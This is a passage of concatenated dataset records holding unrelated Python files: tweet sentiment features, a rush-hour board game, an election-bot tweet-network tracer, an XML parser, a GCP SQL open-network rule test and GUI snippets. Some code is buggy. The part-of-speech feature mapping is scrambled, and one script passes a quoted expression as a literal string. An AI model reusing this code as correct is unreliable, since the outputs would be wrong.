print(e)\n cur.close()\n conn.commit() \n except:\n cur.close()\n conn.commit()\n \n cur.close()\n conn.commit()\n\n#df=pd.DataFrame(columns=['name', 'price'])\n#df.loc[0]=['def2', '110.0']\n#df.loc[1]=['test', '112.0']\n#updateDB(df)","sub_path":"dbConnector.py","file_name":"dbConnector.py","file_ext":"py","file_size_in_byte":4640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"228256459","text":"import tweepy\nimport csv\nimport json\nimport pandas as pd\nimport datetime\nimport os\nfrom datetime import date\nimport nltk\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer\nfrom nltk import tokenize\nfrom nltk.corpus import state_union\nfrom nltk.tokenize import sent_tokenize, word_tokenize, PunktSentenceTokenizer\nfrom SvmClassification import SvmClassification\n\n\n\nclass ExtractFeature:\n \n \n \n def findPoS(self,tweetText):\n train_text = state_union.raw(\"2005-GWBush.txt\")\n custom_sent_tokenizer = PunktSentenceTokenizer(train_text)\n tokenized = custom_sent_tokenizer.tokenize(tweetText)\n posDict = {'CC':0,'CD':0,'DT':0,'EX':0,'FW':0,'IN':0,'JJ':0,'JJR':0,'JJS':0,'LS':0,'MD':0,'NN':0,'NNS':0,'NNP':0,'NNPS':0, 'PDT':0,'POS':0,\n 'PRP':0,'PRP$':0,'RB':0,'RBR':0,'RBS':0,'RP':0,'TO':0,'UH':0,'VB':0,'VBD':0,'VBG':0,'VBN':0,'VBP':0,'VBZ':0,'WDT':0,'WP':0,'WP$':0,\n 'WRB':0}\n \n for i in tokenized:\n words = nltk.word_tokenize(i)\n tagged = nltk.pos_tag(words) \n \n for j in range(len(tagged)):\n x = tagged[j]\n y = x[1]\n if(y in posDict):\n count = int(posDict[y])\n posDict[y] = count+1\n \n return posDict\n \n \n def 
getSentimentNLTK(self,tweetSentence):\n score = []\n try:\n #print('==============getSentimentNLTK starts ====================')\n sid = SentimentIntensityAnalyzer()\n sentimentScore = sid.polarity_scores(tweetSentence)\n score.append(sentimentScore['neu']) \n score.append(sentimentScore['neg']) \n score.append(sentimentScore['pos']) \n score.append(sentimentScore['compound']) \n #print(tweetSentence)\n #print('score = ',score)\n #print('==============getSentimentNLTK ends ====================')\n except :\n score = [0,0,0,0]\n #print('score = ',score)\n return score \n \n def dictToList(self,dictionaryNew):\n self.CCList.append(dictionaryNew['JJS'])\n self.CDList.append(dictionaryNew['POS'])\n self.DTList.append(dictionaryNew['VBD'])\n self.EXList.append(dictionaryNew['NN'])\n self.FWList.append(dictionaryNew['RP'])\n self.INList.append(dictionaryNew['TO'])\n self.JJList.append(dictionaryNew['JJ'])\n self.JJRList.append(dictionaryNew['RB'])\n self.JJSList.append(dictionaryNew['VBG'])\n self.LSList.append(dictionaryNew['UH'])\n self.MDList.append(dictionaryNew['IN'])\n self.NNList.append(dictionaryNew['WDT'])\n self.NNSList.append(dictionaryNew['EX'])\n self.NNPList.append(dictionaryNew['PDT'])\n self.NNPSList.append(dictionaryNew['VB'])\n self.PDTList.append(dictionaryNew['NNS'])\n self.POSList.append(dictionaryNew['LS'])\n self.PRPList.append(dictionaryNew['NNPS'])\n self.PRPDList.append(dictionaryNew['NNP'])\n self.RBList.append(dictionaryNew['WRB'])\n self.RBRList.append(dictionaryNew['JJR'])\n self.RBSList.append(dictionaryNew['VBZ'])\n self.RPList.append(dictionaryNew['CD'])\n self.TOList.append(dictionaryNew['WP'])\n self.UHList.append(dictionaryNew['PRP'])\n self.VBList.append(dictionaryNew['RBR'])\n self.VBDList.append(dictionaryNew['DT'])\n self.VBGList.append(dictionaryNew['FW'])\n self.VBNList.append(dictionaryNew['MD'])\n self.VBPList.append(dictionaryNew['CC'])\n self.VBZList.append(dictionaryNew['VBN'])\n self.WDTList.append(dictionaryNew['VBP'])\n self.WPList.append(dictionaryNew['WP'])\n self.WPDList.append(dictionaryNew['RBS'])\n self.WRBList.append(dictionaryNew['PRP'])\n \n \n \n \n \n \n def __init__(self): \n self.dict1 = {}\n self.dictCount = {}\n self.hashtagList = list()\n self.hashtagCount = list()\n self.directMessageList = list()\n self.urlChkList = list()\n self.hashTagList = list()\n self.questionMarkList = list()\n self.exclamationMarkList = list()\n self.positiveList = list()\n self.negativeList = list()\n self.neutralList = list()\n self.combinedList = list()\n self.positiveEmoticon = list()\n self.negativeEmoticon = list()\n self.posDictList = list()\n self.originalScore = list()\n self.CCList=list()\n self.CDList=list()\n self.DTList=list()\n self.EXList=list()\n self.FWList=list()\n self.INList=list()\n self.JJList=list()\n self.JJRList=list()\n self.JJSList=list()\n self.LSList=list()\n self.MDList=list()\n self.NNList=list()\n self.NNSList=list()\n self.NNPList=list()\n self.NNPSList=list()\n self.PDTList=list()\n self.POSList=list()\n self.PRPList=list()\n self.PRPDList=list()\n self.RBList=list()\n self.RBRList=list()\n self.RBSList=list()\n self.RPList=list()\n self.TOList=list()\n self.UHList=list()\n self.VBList=list()\n self.VBDList=list()\n self.VBGList=list()\n self.VBNList=list()\n self.VBPList=list()\n self.VBZList=list()\n self.WDTList=list()\n self.WPList=list()\n self.WPDList=list()\n self.WRBList=list()\n \n \n \n \n \n def directMsg(self,tweetText):\n if('@' in tweetText ):\n self.directMessageList.append(1)\n else:\n 
self.directMessageList.append(0)\n \n def urlCheck(self,tweetText):\n if('https' in tweetText):\n self.urlChkList.append(1)\n else:\n self.urlChkList.append(0)\n \n def hashCheck(self,tweetText):\n if('#' in tweetText):\n self.hashTagList.append(1)\n else:\n self.hashTagList.append(0)\n \n def questionCheck(self,tweetText):\n if('?' in tweetText):\n self.questionMarkList.append(1)\n else:\n self.questionMarkList.append(0)\n \n def exclamationCheck(self,tweetText):\n if('!' in tweetText):\n self.exclamationMarkList.append(1)\n else:\n self.exclamationMarkList.append(0)\n \n def checkEmoticon(self,tweetText):\n if(':)' in tweetText):\n self.positiveEmoticon.append(1)\n else:\n self.positiveEmoticon.append(0)\n \n if(':(' in tweetText):\n self.negativeEmoticon.append(1)\n else:\n self.negativeEmoticon.append(0)\n \n def features(self,path):\n dirs = os.listdir( path )\n for file in dirs:\n filename = path+file\n print(filename)\n df = pd.read_csv(filename)\n dfList = df.values.tolist()\n for i in range(len(dfList)):\n type = dfList[i][0]\n text = dfList[i][1]\n self.directMsg(text[1:len(text)])\n self.urlCheck(text[1:len(text)])\n self.hashCheck(text[1:len(text)])\n self.questionCheck(text[1:len(text)])\n self.exclamationCheck(text[1:len(text)])\n sentiScore = self.getSentimentNLTK(text[1:len(text)])\n self.neutralList.append(sentiScore[0])\n self.negativeList.append(sentiScore[1])\n self.positiveList.append(sentiScore[2])\n self.combinedList.append(sentiScore[3])\n self.checkEmoticon(text[1:len(text)])\n posDict = self.findPoS(text[1:len(text)])\n self.dictToList(posDict)\n self.posDictList.append(posDict)\n self.originalScore.append(dfList[i][2])\n \n \n \n \n \n directMsg = pd.DataFrame(self.directMessageList)\n urlCheck = pd.DataFrame(self.urlChkList)\n hashCheck = pd.DataFrame(self.hashTagList)\n questionCheck = pd.DataFrame(self.questionMarkList)\n exclamationCheck = pd.DataFrame(self.exclamationMarkList)\n neutralList = pd.DataFrame(self.neutralList)\n negativeList = pd.DataFrame(self.negativeEmoticon)\n positiveList = pd.DataFrame(self.positiveEmoticon)\n combinedList = pd.DataFrame(self.combinedList)\n CCListDf = pd.DataFrame(self.CCList)\n CDListDf = pd.DataFrame(self.CDList)\n DTListDf = pd.DataFrame(self.DTList)\n EXListDf = pd.DataFrame(self.EXList)\n FWListDf = pd.DataFrame(self.FWList)\n INListDf = pd.DataFrame(self.INList)\n JJListDf = pd.DataFrame(self.JJList)\n JJRListDf = pd.DataFrame(self.JJRList)\n JJSListDf = pd.DataFrame(self.JJSList)\n LSListDf = pd.DataFrame(self.LSList)\n MDListDf = pd.DataFrame(self.MDList)\n NNListDf = pd.DataFrame(self.NNList)\n NNSListDf = pd.DataFrame(self.NNSList)\n NNPListDf = pd.DataFrame(self.NNPList)\n NNPSListDf = pd.DataFrame(self.NNPSList)\n PDTListDf = pd.DataFrame(self.PDTList)\n POSListDf = pd.DataFrame(self.POSList)\n PRPListDf = pd.DataFrame(self.PRPList)\n PRPDListDf = pd.DataFrame(self.PRPDList)\n RBListDf = pd.DataFrame(self.RBList)\n RBRListDf = pd.DataFrame(self.RBRList)\n RBSListDf = pd.DataFrame(self.RBSList)\n RPListDf = pd.DataFrame(self.RPList)\n TOListDf = pd.DataFrame(self.TOList)\n UHListDf = pd.DataFrame(self.UHList)\n VBListDf = pd.DataFrame(self.VBList)\n VBDListDf = pd.DataFrame(self.VBDList)\n VBGListDf = pd.DataFrame(self.VBGList)\n VBNListDf = pd.DataFrame(self.VBNList)\n VBPListDf = pd.DataFrame(self.VBPList)\n VBZListDf = pd.DataFrame(self.VBZList)\n WDTListDf = pd.DataFrame(self.WDTList)\n WPListDf = pd.DataFrame(self.WPList)\n WPDListDf = pd.DataFrame(self.WPDList)\n WRBListDf = pd.DataFrame(self.WRBList)\n 
scoreDf = pd.DataFrame(self.originalScore)\n \n frames = [directMsg, urlCheck, hashCheck, questionCheck, exclamationCheck, neutralList, negativeList,positiveList, combinedList,\n CCListDf,CDListDf,DTListDf,EXListDf,FWListDf,INListDf,JJListDf,JJRListDf,JJSListDf,LSListDf,MDListDf,NNListDf,NNSListDf,\n NNPListDf,NNPSListDf,PDTListDf,POSListDf,PRPListDf,PRPDListDf,RBListDf,RBRListDf,RBSListDf,RPListDf,TOListDf,UHListDf,\n VBListDf,VBDListDf,VBGListDf,VBNListDf,VBPListDf,VBZListDf,WDTListDf,WPListDf,WPDListDf,WRBListDf,scoreDf]\n \n \n \n result = pd.concat(frames,axis=1)\n result.to_csv(\"..\\\\shorttext\\\\labled\\\\not_marged_result\\\\\"+file.split(\".\")[0]+\".csv\")\n\n print(\"..\\\\shorttext\\\\labled\\\\not_marged_result\\\\\"+file.split(\".\")[0]+\".csv\")\n\npath = \"..\\\\shorttext\\\\labled\\\\not_marged\\\\\"\n\nextrctFeature = ExtractFeature()\nextrctFeature.features(path) ","sub_path":"source/ExtractFeature.py","file_name":"ExtractFeature.py","file_ext":"py","file_size_in_byte":11304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"157275781","text":"from app import db, models\nfrom app.models import Section, Survey, Consent\nimport json\n\ndef survey_to_json(survey):\n    json_survey = [{\n        'title': survey.title,\n        'description': survey.description,\n        'created': survey.created,\n        'startDate': survey.startDate,\n        'endDate': survey.endDate,\n        'maxNumberRespondents': survey.maxNumberRespondents,\n        # 'consents': survey.consents.to_json()\n    }]\n    return json.dumps(json_survey,indent=2)\n\ndef survey_from_json(survey):\n    pass\n\ndef consent_to_json(consent):\n    json_survey = {\n        'text': consent.text,\n    }\n    return json_survey\n\n","sub_path":"pruebas/testJson.py","file_name":"testJson.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"505281234","text":"############################################################\n# Imports\n############################################################\nimport game_helper as gh\nfrom car import Car, Direction\nimport math\n############################################################\n# Constants\n############################################################\n\n# place your constants here\nERROR_MSG_CAR_NOT_ADDED = \"The car wasn't added to the board\"\nERROR_MSG_LOCATION_IS_OUT_OF_BOUNDS = \"The car location is outside the board\"\nERROR_MSG_LOCATION_TAKEN = \"The location has already been taken\"\nERROR_MSG_ONLY_ONE_SQUARE = \"you can only move one square at a time\"\nCAR_ADDED = \"A car was added successfully!\"\nWRONG_DIRECTION = \"unavailable direction\"\nOUT_BOUNDS_MSG = \"Can't move the car - out of bounds \" \\\n                 \"(can't move the car outside the game board)\"\n############################################################\n# Class definition\n############################################################\n\n\n\nclass Board():\n    \"\"\"\n    A class representing a rush hour board.\n    \"\"\"\n\n    def __init__(self, cars, exit_board, size=6):\n        \"\"\"\n        Initialize a new Board object.\n        :param cars: A list (or dictionary) of cars; can be empty.\n        :param size: Size of board (Default size is 6). 
\n        \"\"\"\n        # implement your code here (and then delete the next line - 'pass')\n        self.cars = cars\n        self.exit_board = exit_board\n        self.size = size\n        self.height = size\n        self.width = size\n\n    def get_cars(self):\n        return self.cars\n\n    def add_car(self, car):\n        \"\"\"\n        Add a single car to the board.\n        :param car: A car object\n        :return: True if a car was successfully added, or False otherwise.\n        \"\"\"\n        \"\"\"Check if the location is empty; if so, add the car to the \n        board and return True, else return False.\"\"\"\n        if self.is_empty(car.get_location()):\n            self.cars.append(car)\n            print(CAR_ADDED)\n            return True\n        print(ERROR_MSG_CAR_NOT_ADDED)\n        return False\n\n    def is_empty(self, location):\n        \"\"\"\n        Check if a given location on the board is free.\n        :param location: x and y coordinates of the location to be checked\n        :return: True if location is free, False otherwise\n        \"\"\"\n        \"\"\"Check whether the location is empty: if it is, \n        return True, else return False.\"\"\"\n        if not 0 <= location[0] < self.size or not 0 <= location[1] < self.size:\n            # out of bounds\n            print(OUT_BOUNDS_MSG)\n            return False\n        for car in self.cars:\n            if car.orientation == 0:\n                x, y = location\n                x1, y1 = car.get_location()\n                if x == x1 and y == y1:\n                    # location has already been taken by another car\n                    return False\n            elif car.orientation == 1:\n                for i in range(0, car.length):\n                    x, y = location\n                    x1, y1 = car.get_location()\n                    if x == x1 and y == y1+i:\n                        # location has already been taken by another car\n                        return False\n        return True\n\n    def move(self, car, direction):\n        \"\"\"\n        Move a car in the given direction.\n        :param car: A Car object to be moved.\n        :param direction: A Direction object representing desired direction\n        to move car.\n        :return: True if movement was possible and car was moved, False otherwise.\n        \"\"\"\n        # implement your code here (and then delete the next line - 'pass')\n        new_location = car.get_location()[:]\n        new_location1 = car.get_location()[:]\n        new_location = list(new_location)\n        lenn = car.length\n        if car.orientation == 0:\n            if direction == 8:\n                new_location[0] -= 1\n            elif direction == 2:\n                new_location[0] += lenn\n            else:\n                print(WRONG_DIRECTION)\n                return False\n        elif car.orientation == 1:\n            if direction == 6:\n                new_location[1] += lenn\n            elif direction == 4:\n                new_location[1] -= 1\n            else:\n                print(WRONG_DIRECTION)\n                return False\n        if self.is_empty(new_location):\n            if direction == 2:\n                new_location[0] = new_location[0] - lenn + 1\n            elif direction == 6:\n                new_location[1] = new_location[1] - lenn + 1\n            car.set_location(new_location)\n            return True\n        else:\n            print(ERROR_MSG_LOCATION_TAKEN)\n            return False\n\n    def __repr__(self):\n        \"\"\"\n        :return: Return a string representation of the board.\n        \"\"\"\n        final_lst = []\n        for i in range(0, self.size):\n            temp_listt = []\n            for i in range(0, self.size):\n                temp_listt.append('_')\n            final_lst.append(temp_listt)\n\n        for car in self.cars:\n            car_color = car.color\n            car_location = car.get_location()\n            if car.orientation == 0:\n                for k in range(0, car.length):\n                    x, y = car_location\n                    final_lst[x+k][y] = car_color\n            elif car.orientation == 1:\n                for j in range(0, car.length):\n                    x, y = car_location\n                    final_lst[x][y+j] = car_color\n        car_exit_location = self.exit_board\n        x, y = car_exit_location\n        final_lst[x][y] += 'E'\n        return str(print_lst(final_lst))\n\n\ndef print_lst(final_lst):\n    for i in range(0, len(final_lst)):\n        print(final_lst[i])\n    return ''\n","sub_path":"Python/EX8 - Car Game - release the red 
car/temp/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":5765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"510927359","text":"import pandas as pd\nimport numpy as np\nfrom os import path\nimport time\nimport subprocess\nfrom subprocess import PIPE\nimport ast\n\n###################DataFrames:#####################################\n#Read File of all the unique userids of the bots that tweeted messages regarding to the 2016 elections.\ndfn = pd.read_csv(\"/root/.encrypted/.pythonSai/kCoreBots/CoreBotEN/MachineLearning/NaiveBayes/ListIDS.csv\", sep=\"\\n\", skiprows=[0], header=None, usecols=[0], names=[\"userid\"])\n#Dataframe that will store, a dictionary contaning the network of a certain tweet between a sequence of bots, in each cell.\ndfd = pd.DataFrame(columns=[\"OringatorBotUserID\", \"DIRECTEDFLOW\", \"Candidate\", \"Sentiment\"])\n\ntil=[] #List that contains the tweet ids for all the bots in the network.\nuil=[]\t#List that contais userids of all the bots in the network.\nntl=[]\t#List that stores the tuples to create the network of the directed flow between a certain tweet between a sequence of bots.\n\n#Iteratring through each bot userid from above [i.e. iterating through every bot's file in present working directory].\nfor i in dfn.index:\n\tif(i>887):\n\t\tprint(i)\n\t\tfsn = \"/root/.encrypted/.pythonSai/kCoreBots/CoreBotEN/MachineLearning/NaiveBayes/CoreBotsSentiment/Bot-\"+str(dfn[\"userid\"][i])+\"-EN.csv\"\n\t\tif(path.isfile(fsn)==True): #If such a bots csv file exists in the current directory\n\n\t\t\t#Setup the dataframe that reads each bot's tweet csv file.\n\t\t\tdfi = pd.read_csv(fsn, sep=\",\", header=None, names=[\"tweetid\",\"userid\",\"tweet_candidate_class\",\"tweet_sentiment_class\"])\n\t\t\t#Iterating through each political tweet sent by both during the 2016 elections read from the bot's file present in the current working directory.\n\t\t\tfor j in dfi.index:\n\t\t\t\tprint(\"start new\")\n\t\t\t\tt0 = time.time()\n\t\t\t\tais = \"[ '\"+str(dfi[\"userid\"][j]) + \"' ,'\" + str(dfi[\"tweetid\"][j]) + \"' ,[] ,\" + \"[] ,\" + \"[]]\"\n\t\t\t\t#Run the mainDataframeScript.py from the os.\n\t\t\t\ttsv = subprocess.Popen([\"python3\", \"mainDataframeScript.py\"]+[ais], stdout=PIPE)\t#temporary storage variable.\n\t\t\t\t#Store the output and error of mainDataframeScript.py print statement.\n\t\t\t\t(out, err) = tsv.communicate()\n\t\t\t\t#This makes the wait possible\n\t\t\t\tp_status = tsv.wait()\n\n\t\t\t\tout = ast.literal_eval(out.decode(\"utf-8\"))\n\t\t\t\ttmp = out[0]\t#temporary list\n\t\t\t\tntl = ntl + tmp\n\t\t\t\t#ntl = list(dict.fromkeys(ntl)) #Remove all duplicates from ntl list using \"Dictionary\" data object.\n\t\t\t\t#ntl = [(rm1, bti) if isinstance(bti, tuple) is False else bti for bti in ntl]\n\n\t\t\t\ttmp = out[1]\n\t\t\t\tuil = uil + tmp\n\t\t\t\tuil = list(dict.fromkeys(uil))\n\n\t\t\t\ttmp = out[2]\n\t\t\t\ttil = til + tmp\n\t\t\t\ttil = list(dict.fromkeys(til))\n\n\t\t\t\tt1 = time.time()\n\t\t\t\tprint(\"Time taken to run MainDataframe script = \" + str(out[3])+\"s\")\n\t\t\t\tprint(t1-t0)\n\t\t\t\t#print(uil)\n\t\t\t\tif(uil and uil!=['']):\n\t\t\t\t\t#print(\"uil\")\n\t\t\t\t\t#print(uil)\n\t\t\t\t\t#print(\"ntl\")\n\t\t\t\t\t#print(ntl)\n\t\t\t\t\t#print(\"til\")\n\t\t\t\t\t#print(til)\n\t\t\t\t\t#print(\"\\n\")\n\t\t\t\t\tfor k in 
range(0,len(uil)):\n\t\t\t\t\t\t#print(k)\n\t\t\t\t\t\t#print(len(uil))\n\t\t\t\t\t\t#print(til[k])\n\t\t\t\t\t\t#print(ntl[k])\n\t\t\t\t\t\tais = \"['\"+str(uil[k]) + \"','\" + \"str(til[k])\" + \"',[] ,\" + \"[] ,\"+ \"[]]\"\n\t\t\t\t\t\ttsv = subprocess.Popen([\"python3\", \"mainDataframeScript.py\"]+[ais], stdout=PIPE) #temporary storage variable.\n\t\t\t\t\t\t#Store the output and error of mainDataframeScript.py print statement.\n\t\t\t\t\t\t(out, err) = tsv.communicate()\n\t\t\t\t\t\t#This makes the wait possible.\n\t\t\t\t\t\tp_status = tsv.wait()\n\n\t\t\t\t\t\tout = ast.literal_eval(out.decode(\"utf-8\"))\n\t\t\t\t\t\ttmp = out[0] #temporary list\n\t\t\t\t\t\tntl = ntl + tmp\n\t\t\t\t\t\t#ntl = list(dict.fromkeys(ntl)) #Remove all duplicates from ntl list using \"Dictionary\" data object.\n\t\t\t\t\t\t#ntl = [(rm1, bti) if isinstance(bti, tuple) is False else bti for bti in ntl]\n\n\t\t\t\t\t\ttmp = out[1]\n\t\t\t\t\t\tuil = uil + tmp\n\t\t\t\t\t\tuil = list(dict.fromkeys(uil))\n\n\t\t\t\t\t\ttmp = out[2]\n\t\t\t\t\t\ttil = til + tmp\n\t\t\t\t\t\ttil = list(dict.fromkeys(til))\n\n\t\t\t\t\t#Inserting row into dataframe to store the entire network of bots that transmitted a particular tweet starting from the originator bot. In this case, the \"first column\"=originator bot userid, \"second column\"=entire network in list format [i.e. ntl]\n\t\t\t\t\tdfd.loc[0] = [dfi[\"userid\"][j], ntl, dfi[\"tweet_candidate_class\"][j], dfi[\"tweet_sentiment_class\"][j]]\t#Also stores #Candidate and Sentiment Classes the network of bots is targetting.\n\t\t\t\t\tdfd[[\"OringatorBotUserID\", \"DIRECTEDFLOW\", \"Candidate\", \"Sentiment\"]].to_csv(\"networkUserID.csv\", mode='a', header=False, index=False)\n\t\t\t\t\tdfd.iloc[0:0]\n\t\t\t\t\tntl=[]\n\t\t\t\t\tuil=[]\n\t\t\t\t\ttil=[]\n\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\tdfd.loc[0] = [dfi[\"userid\"][j], ntl, dfi[\"tweet_candidate_class\"][j], dfi[\"tweet_sentiment_class\"][j]] #Also stores #Candidate and Sentiment Classes the network of bots is targetting.\n\t\t\t\t\tdfd[[\"OringatorBotUserID\", \"DIRECTEDFLOW\", \"Candidate\", \"Sentiment\"]].to_csv(\"networkUserID.csv\", mode='a', header=False, index=False)\n\t\t\t\t\tdfd.iloc[0:0]\n\t\t\t\t\tntl=[]\n\t\t\t\t\tuil=[]\n\t\t\t\t\ttil=[]\n\t\t\t\t\tbreak\n\n\n############Writing the dataframe to a CSV file:\n#dfd[[\"OringatorBotUserID\", \"DIRECTEDFLOW\", \"Candidate\", \"Sentiment\"]].to_csv(\"network.csv\", mode='a', header=False, index=False)\n","sub_path":"kCoreBots/CoreBotEN/MachineLearning/NaiveBayes/CoreBotsSentiment/PythonScripts/directedGraph.py","file_name":"directedGraph.py","file_ext":"py","file_size_in_byte":5112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"502780242","text":"from config import ground_truth_directory, OBJ_NAME, iou_output_path\nimport os\nimport json\nfrom xml.etree import ElementTree as ET\n\n\n# load files\ntruth_ls = []\nfor gt in os.scandir(ground_truth_directory):\n if gt.path.endswith('.xml') and gt.is_file():\n truth_ls.append(gt.path)\ntruth_ls.sort()\n\n\ndef extract_xml(file_name):\n tree = ET.parse(file_name)\n root = tree.getroot()\n xmax = int(root.find(\"./object/bndbox/xmax\").text)\n xmin = int(root.find(\"./object/bndbox/xmin\").text)\n ymax = int(root.find(\"./object/bndbox/ymax\").text)\n ymin = int(root.find(\"./object/bndbox/ymin\").text)\n x = 0.5 * (xmax + xmin)\n y = 0.5 * (ymax + ymin)\n w = xmax - xmin\n h = ymax - ymin\n return [OBJ_NAME, 1, [x, y, w, h]]\n\n\ndef make_csv():\n 
print('begin to parse xml file ...')\n final_list = []\n for gt_file in truth_ls:\n final_list.append(extract_xml(gt_file))\n with open(iou_output_path + 'ground_truth.json', 'w') as f:\n json.dump(final_list, f, indent=2)\n print('made json file')\n print('-----------------------------------')\n","sub_path":"iou_output/parse_xml.py","file_name":"parse_xml.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"132297797","text":"from unittest import TestCase\nfrom parameterized import parameterized\nfrom cloudrail.dev_tools.rule_test_utils import create_empty_entity\nfrom cloudrail.knowledge.context.gcp.gcp_environment_context import GcpEnvironmentContext\nfrom cloudrail.knowledge.context.gcp.resources.sql.gcp_sql_database_instance import GcpSqlDatabaseInstance, \\\n GcpSqlDBInstanceSettings, GcpSqlDBInstanceSettingsIPConfig, GcpSqlDBInstanceIPConfigAuthNetworks\nfrom cloudrail.knowledge.rules.base_rule import RuleResultType\nfrom cloudrail.knowledge.rules.gcp.non_context_aware.sql_restrict_trusted_ip_rule import \\\n SqlDatabaseRestrictTrustedIpRule\n\n\nclass TestSqlDatabaseSslRequired(TestCase):\n def setUp(self):\n self.rule = SqlDatabaseRestrictTrustedIpRule()\n\n @parameterized.expand(\n [\n [\"cloud sql private ip\", \"8.8.4.0/24\", \"35.198.0.0/16\", False],\n [\"cloud sql private and open ip\", \"8.8.4.0/24\", \"0.0.0.0/0\", True]\n ]\n )\n\n def test_cloud_sql_restrict_trusted_ip(self, unused_name: str, config_auth_networks_value_1: str,config_auth_networks_value_2: str, should_alert: bool):\n # Arrange\n sql = create_empty_entity(GcpSqlDatabaseInstance)\n sql.name = 'name'\n authorized_networks = [GcpSqlDBInstanceIPConfigAuthNetworks(value=config_auth_networks_value_1, name=None, expiration_time=None),\n GcpSqlDBInstanceIPConfigAuthNetworks(value=config_auth_networks_value_2, name=None, expiration_time=None)]\n ip_configuration = GcpSqlDBInstanceSettingsIPConfig(authorized_networks=authorized_networks,\n ipv4_enabled=None, private_network=None, require_ssl=None)\n settings = create_empty_entity(GcpSqlDBInstanceSettings)\n settings.ip_configuration = ip_configuration\n sql.settings = settings\n context = GcpEnvironmentContext(sql_database_instances=[sql])\n # Act\n result = self.rule.run(context, {})\n # Assert\n if should_alert:\n self.assertEqual(RuleResultType.FAILED, result.status)\n self.assertEqual(1, len(result.issues))\n else:\n self.assertEqual(RuleResultType.SUCCESS, result.status)\n self.assertEqual(0, len(result.issues))\n","sub_path":"tests/knowledge/rules/gcp/non_context_aware/test_sql_database_restrict_trusted_ip.py","file_name":"test_sql_database_restrict_trusted_ip.py","file_ext":"py","file_size_in_byte":2290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"422019241","text":"import wx\r\nimport sqlite3\r\nfrom Users登录 import *\r\nfrom DBM登录 import *\r\n\r\nclass Choice(wx.Frame):\r\n def __init__(self, parent, id):\r\n wx.Frame.__init__(self, parent, id, title = \"登录选择\", pos = (700, 300), size =(400, 300))\r\n panel = wx.Panel(self)\r\n text = wx.StaticText(panel, label = \"请选择登录的方式\", pos = (140, 70))\r\n text.SetForegroundColour(\"Black\")\r\n self.bt1 = wx.Button(panel, label = \"管理员\", pos = (105, 130))\r\n self.bt2 = wx.Button(panel, label = \"普通用户\", pos = (195, 130))\r\n self.bt1.Bind(wx.EVT_BUTTON, self.bt1_f)\r\n self.bt2.Bind(wx.EVT_BUTTON, self.bt2_f)\r\n\r\n def bt1_f(self,event):\r\n 
self.Destroy()\r\n DBMmain()\r\n def bt2_f(self, event):\r\n self.Destroy()\r\n Loginmain()\r\n\r\nif __name__ == \"__main__\":\r\n app = wx.App()\r\n frame = Choice(None, -1)\r\n frame.Show()\r\n frame.Centre()\r\n app.MainLoop()\r\n","sub_path":"满月客栈/登录选择.py","file_name":"登录选择.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"6611462","text":"# Based on CreateQuadGeometry example\n# \n\n# These are the simpl_py python modules\n\nfrom dream3d import simplpy as d3d\nfrom dream3d import simpl\nfrom dream3d import simpl_helpers as sc\nfrom dream3d import simpl_test_dirs as sd\n\ndef CreateQuadGeometryTest():\n # Create Data Container Array\n dca = simpl.DataContainerArray.New()\n\n # Create the Data Container\n err = d3d.create_data_container(dca, \"DataContainer\")\n if err < 0:\n print(\"DataContainer ErrorCondition: %d\" % err)\n\n # Import ASCII Data - #1 - Vertex Coordinates\n importFile = sd.GetBuildDirectory() + \"/Data/SIMPL/VertexCoordinates.csv\"\n wizardData = {\n \"inputFilePath\": importFile,\n \"beginIndex\": 2,\n \"numberOfLines\": 145,\n \"delimiters\": [','], \n \"consecutiveDelimiters\": False,\n \"automaticAM\": True,\n \"selectedPath\": simpl.DataArrayPath(\"DataContainer\", \"Bounds\", \"\"),\n \"headers\": [\"x\", \"y\", \"z\"],\n \"attrMatType\": 3,\n \"tupleDimensions\": [144],\n \"dataTypes\": [\"float\", \"float\", \"float\"]\n }\n err = d3d.read_ascii_data(dca, wizardData)\n if err < 0:\n print(\"Import ASCII Data #1 - ErrorCondition: %d\" % err)\n \n\n # Import ASCII Data - #2 - Edge Connectivity\n importFile = sd.GetBuildDirectory() + \"/Data/SIMPL/QuadConnectivity.csv\"\n wizardData = {\n \"inputFilePath\": importFile,\n \"beginIndex\": 2,\n \"numberOfLines\": 122,\n \"delimiters\": [','], \n \"consecutiveDelimiters\": False,\n \"automaticAM\": True,\n \"selectedPath\": simpl.DataArrayPath(\"DataContainer\", \"QuadList\", \"\"),\n \"headers\": [\"V0\", \"V1\", \"V2\", \"V3\"],\n \"attrMatType\": 3,\n \"tupleDimensions\": [121],\n \"dataTypes\": [\"int64_t\", \"int64_t\",\"int64_t\", \"int64_t\"]\n } \n err = d3d.read_ascii_data(dca, wizardData)\n if err < 0:\n print(\"Import ASCII Data #2 - ErrorCondition: %d\" % err)\n\n # Combine Attribute Arrays # 1:\n selectedDataArrayPaths = [simpl.DataArrayPath(\"DataContainer\", \"Bounds\", \"x\"), \n simpl.DataArrayPath(\"DataContainer\", \"Bounds\", \"y\"), \n simpl.DataArrayPath(\"DataContainer\", \"Bounds\", \"z\")]\n err = d3d.combine_attribute_arrays(dca, selectedDataArrayPaths, \"Vertices\", False)\n if err < 0:\n print(\"Combined Attribute Arrays #1 - ErrorCondition: %d\" % err)\n\n # Delete Data # 1\n dcap = simpl.DataContainerArrayProxy()\n dcap.getDataContainerProxy(\"DataContainer\").Flag = 0\n dcap.getDataContainerProxy(\"DataContainer\").getAttributeMatrixProxy(\"Bounds\").Flag = 0\n dcap.getDataContainerProxy(\"DataContainer\").getAttributeMatrixProxy(\"Bounds\").getDataArrayProxy(\"x\").Flag = 2\n 